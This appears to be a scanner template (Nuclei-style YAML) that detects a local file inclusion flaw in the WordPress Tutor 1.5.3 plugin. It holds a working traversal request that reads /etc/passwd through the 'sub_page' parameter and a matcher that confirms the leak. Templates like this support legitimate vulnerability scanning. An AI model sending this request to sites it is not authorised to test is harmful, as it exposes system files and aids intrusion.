id: wp-tutor-lfi

info:
  name: WordPress tutor 1.5.3 - Local File Inclusion
  author: 0x240x23elu
  severity: high
  description: WordPress tutor.1.5.3 is vulnerable to local file inclusion.
  reference:
    - https://www.exploit-db.com/exploits/48058
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-22
  tags: wordpress,wp-plugin,lfi,edb

requests:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/tutor/views/pages/instructors.php?sub_page=/etc/passwd"

    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"
        part: body

# Enhanced by mp on 2022/07/29
